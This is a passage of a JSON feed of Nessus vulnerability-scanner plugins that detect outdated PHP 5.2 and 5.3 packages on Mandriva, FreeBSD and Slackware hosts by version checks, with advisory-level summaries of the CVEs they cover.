audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mod_php-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"i386\", reference:\"libphp5_common5-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-apc-3.1.3p1-2.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-apc-admin-3.1.3p1-2.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-bcmath-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-bz2-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-calendar-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-cgi-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-cli-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-ctype-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-curl-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-dba-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-devel-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-doc-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-dom-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-eaccelerator-0.9.6-0.358.4.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-eaccelerator-admin-0.9.6-0.358.4.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-enchant-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-exif-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-fileinfo-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-filter-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-ftp-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-gd-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-gettext-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-gmp-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-hash-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-iconv-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-imap-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-intl-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-json-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-ldap-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-mbstring-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-mcrypt-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-mssql-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-mysql-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-mysqli-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-odbc-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-openssl-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-pcntl-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-pdo-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-pdo_dblib-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-pdo_mysql-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-pdo_odbc-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-pdo_pgsql-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-pdo_sqlite-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-pgsql-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-posix-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-pspell-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-readline-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-recode-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-session-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-shmop-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-snmp-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-soap-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-sockets-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-sqlite3-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-suhosin-0.9.29-2.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-sybase_ct-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-sysvmsg-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-sysvsem-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-sysvshm-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-tidy-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-tokenizer-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-wddx-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-xml-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-xmlreader-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-xmlrpc-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-xmlwriter-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-xsl-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-zip-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"php-zlib-5.3.1-0.1mdv2010.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T04:54:24", "description": "According to its banner, the version of PHP 5.3 installed on the\nremote host is older than 5.3.1. Such versions may be affected by\nseveral security issues :\n\n - Sanity checks are missing in exif processing.\n\n - It is possible to bypass the 'safe_mode' configuration\n setting using 'tempnam()'.\n\n - It is possible to bypass the 'open_basedir' \n configuration setting using 'posix_mkfifo()'.\n\n - The 'safe_mode_include_dir' configuration setting may\n be ignored. (Bug #50063)\n\n - Calling 'popen()' with an invalid mode can cause a \n crash under Windows. (Bug #44683)\n\n - Provided file uploading is enabled (it is by default),\n an attacker can upload files using a POST request with\n 'multipart/form-data' content even if the target script \n doesn't actually support file uploads per se. By\n supplying a large number (15,000+) of files, an attacker\n could cause the web server to stop responding while it\n processes the file list.\n\n - 'proc_open()' can bypass 'safe_mode_protected_env_vars'.\n (Bug #49026)\n\n - An unspecified vulnerability affects the LCG entropy.", "edition": 25, "published": "2009-11-20T00:00:00", "title": "PHP 5.3 < 5.3.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4018", "CVE-2009-4017", "CVE-2009-3559", "CVE-2010-1128", "CVE-2009-3557"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_3_1.NASL", "href": "https://www.tenable.com/plugins/nessus/42862", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42862);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\n \"CVE-2009-3557\",\n \"CVE-2009-3559\",\n \"CVE-2009-4017\",\n \"CVE-2009-4018\",\n \"CVE-2010-1128\"\n );\n script_bugtraq_id(36554, 36555, 37079, 37138);\n script_xref(name:\"Secunia\", value:\"37412\");\n\n script_name(english:\"PHP 5.3 < 5.3.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of PHP\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple flaws.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the version of PHP 5.3 installed on the\nremote host is older than 5.3.1. Such versions may be affected by\nseveral security issues :\n\n - Sanity checks are missing in exif processing.\n\n - It is possible to bypass the 'safe_mode' configuration\n setting using 'tempnam()'.\n\n - It is possible to bypass the 'open_basedir' \n configuration setting using 'posix_mkfifo()'.\n\n - The 'safe_mode_include_dir' configuration setting may\n be ignored. (Bug #50063)\n\n - Calling 'popen()' with an invalid mode can cause a \n crash under Windows. (Bug #44683)\n\n - Provided file uploading is enabled (it is by default),\n an attacker can upload files using a POST request with\n 'multipart/form-data' content even if the target script \n doesn't actually support file uploads per se. By\n supplying a large number (15,000+) of files, an attacker\n could cause the web server to stop responding while it\n processes the file list.\n\n - 'proc_open()' can bypass 'safe_mode_protected_env_vars'.\n (Bug #49026)\n\n - An unspecified vulnerability affects the LCG entropy.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/archive/1/507982/30/0/threaded\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/releases/5_3_1.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-5.php#5.3.1\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to PHP version 5.3.1 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^5\\.3\\.0($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 5.3.1\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:41:27", "description": "PHP developers reports :\n\nThis release focuses on improving the stability of the PHP 5.2.x\nbranch with over 60 bug fixes, some of which are security related. All\nusers of PHP 5.2 are encouraged to upgrade to this release.\n\nSecurity Enhancements and Fixes in PHP 5.2.12 :\n\n- Fixed a safe_mode bypass in tempnam() identified by Grzegorz\nStachowiak. (CVE-2009-3557, Rasmus)\n\n- Fixed a open_basedir bypass in posix_mkfifo() identified by Grzegorz\nStachowiak. (CVE-2009-3558, Rasmus)\n\n- Added 'max_file_uploads' INI directive, which can be set to limit\nthe number of file uploads per-request to 20 by default, to prevent\npossible DOS via temporary file exhaustion, identified by Bogdan\nCalin. (CVE-2009-4017, Ilia)\n\n- Added protection for $_SESSION from interrupt corruption and\nimproved 'session.save_path' check, identified by Stefan Esser.\n(CVE-2009-4143, Stas)\n\n- Fixed bug #49785 (insufficient input string validation of\nhtmlspecialchars()). (CVE-2009-4142, Moriyoshi, hello at iwamot dot\ncom)", "edition": 26, "published": "2009-12-18T00:00:00", "title": "FreeBSD : php -- multiple vulnerabilities (39a25a63-eb5c-11de-b650-00215c6a37bb)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3558", "CVE-2009-4142", "CVE-2009-4017", "CVE-2009-4143", "CVE-2009-3557"], "modified": "2009-12-18T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:php5"], "id": "FREEBSD_PKG_39A25A63EB5C11DEB65000215C6A37BB.NASL", "href": "https://www.tenable.com/plugins/nessus/43342", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43342);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-4017\", \"CVE-2009-4142\", \"CVE-2009-4143\");\n\n script_name(english:\"FreeBSD : php -- multiple vulnerabilities (39a25a63-eb5c-11de-b650-00215c6a37bb)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PHP developers reports :\n\nThis release focuses on improving the stability of the PHP 5.2.x\nbranch with over 60 bug fixes, some of which are security related. All\nusers of PHP 5.2 are encouraged to upgrade to this release.\n\nSecurity Enhancements and Fixes in PHP 5.2.12 :\n\n- Fixed a safe_mode bypass in tempnam() identified by Grzegorz\nStachowiak. (CVE-2009-3557, Rasmus)\n\n- Fixed a open_basedir bypass in posix_mkfifo() identified by Grzegorz\nStachowiak. (CVE-2009-3558, Rasmus)\n\n- Added 'max_file_uploads' INI directive, which can be set to limit\nthe number of file uploads per-request to 20 by default, to prevent\npossible DOS via temporary file exhaustion, identified by Bogdan\nCalin. (CVE-2009-4017, Ilia)\n\n- Added protection for $_SESSION from interrupt corruption and\nimproved 'session.save_path' check, identified by Stefan Esser.\n(CVE-2009-4143, Stas)\n\n- Fixed bug #49785 (insufficient input string validation of\nhtmlspecialchars()). (CVE-2009-4142, Moriyoshi, hello at iwamot dot\ncom)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/releases/5_2_12.php\"\n );\n # https://vuxml.freebsd.org/freebsd/39a25a63-eb5c-11de-b650-00215c6a37bb.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?95912059\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(79, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php5<5.2.12\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T04:54:23", "description": "According to its banner, the version of PHP installed on the remote\nhost is older than 5.2.12. Such versions may be affected by several\nsecurity issues :\n\n - It is possible to bypass the 'safe_mode' configuration\n setting using 'tempnam()'. (CVE-2009-3557)\n\n - It is possible to bypass the 'open_basedir' \n configuration setting using 'posix_mkfifo()'. \n (CVE-2009-3558)\n\n - Provided file uploading is enabled (it is by default),\n an attacker can upload files using a POST request with\n 'multipart/form-data' content even if the target script\n doesn't actually support file uploads per se. By \n supplying a large number (15,000+) of files, an attacker\n could cause the web server to stop responding while it\n processes the file list. (CVE-2009-4017)\n\n - Missing protection for '$_SESSION' from interrupt\n corruption and improved 'session.save_path' check.\n (CVE-2009-4143)\n\n - Insufficient input string validation in the \n 'htmlspecialchars()' function. (CVE-2009-4142)", "edition": 25, "published": "2009-12-18T00:00:00", "title": "PHP < 5.2.12 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3558", "CVE-2009-4142", "CVE-2009-4017", "CVE-2009-4143", "CVE-2009-3557"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_2_12.NASL", "href": "https://www.tenable.com/plugins/nessus/43351", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43351);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\n \"CVE-2009-3557\",\n \"CVE-2009-3558\",\n \"CVE-2009-4017\",\n \"CVE-2009-4142\",\n \"CVE-2009-4143\"\n );\n script_bugtraq_id(37389, 37390);\n script_xref(name:\"Secunia\", value:\"37821\");\n\n script_name(english:\"PHP < 5.2.12 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of PHP\");\n\n script_set_attribute(attribute:\"synopsis\",value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple flaws.\"\n );\n script_set_attribute(attribute:\"description\",value:\n\"According to its banner, the version of PHP installed on the remote\nhost is older than 5.2.12. Such versions may be affected by several\nsecurity issues :\n\n - It is possible to bypass the 'safe_mode' configuration\n setting using 'tempnam()'. (CVE-2009-3557)\n\n - It is possible to bypass the 'open_basedir' \n configuration setting using 'posix_mkfifo()'. \n (CVE-2009-3558)\n\n - Provided file uploading is enabled (it is by default),\n an attacker can upload files using a POST request with\n 'multipart/form-data' content even if the target script\n doesn't actually support file uploads per se. By \n supplying a large number (15,000+) of files, an attacker\n could cause the web server to stop responding while it\n processes the file list. (CVE-2009-4017)\n\n - Missing protection for '$_SESSION' from interrupt\n corruption and improved 'session.save_path' check.\n (CVE-2009-4143)\n\n - Insufficient input string validation in the \n 'htmlspecialchars()' function. (CVE-2009-4142)\"\n );\n # http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?57f2d08f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/releases/5_2_12.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-5.php#5.2.12\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to PHP version 5.2.12 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(79, 264);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^[0-4]\\.\" || \n version =~ \"^5\\.[01]\\.\" ||\n version =~ \"^5\\.2\\.([0-9]|1[01])($|[^0-9])\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 5.2.12\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T09:10:33", "description": "New php packages are available for Slackware 11.0, 12.0, 12.1, 12.2,\n13.0, and -current to fix security issues.", "edition": 25, "published": "2010-01-25T00:00:00", "title": "Slackware 11.0 / 12.0 / 12.1 / 12.2 / 13.0 / current : php (SSA:2010-024-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3558", "CVE-2009-4142", "CVE-2009-4017", "CVE-2009-4143", "CVE-2009-3557"], "modified": "2010-01-25T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:12.0", "cpe:/o:slackware:slackware_linux:12.2", "cpe:/o:slackware:slackware_linux:13.0", "p-cpe:/a:slackware:slackware_linux:php", "cpe:/o:slackware:slackware_linux:11.0", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:12.1"], "id": "SLACKWARE_SSA_2010-024-02.NASL", "href": "https://www.tenable.com/plugins/nessus/44121", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security 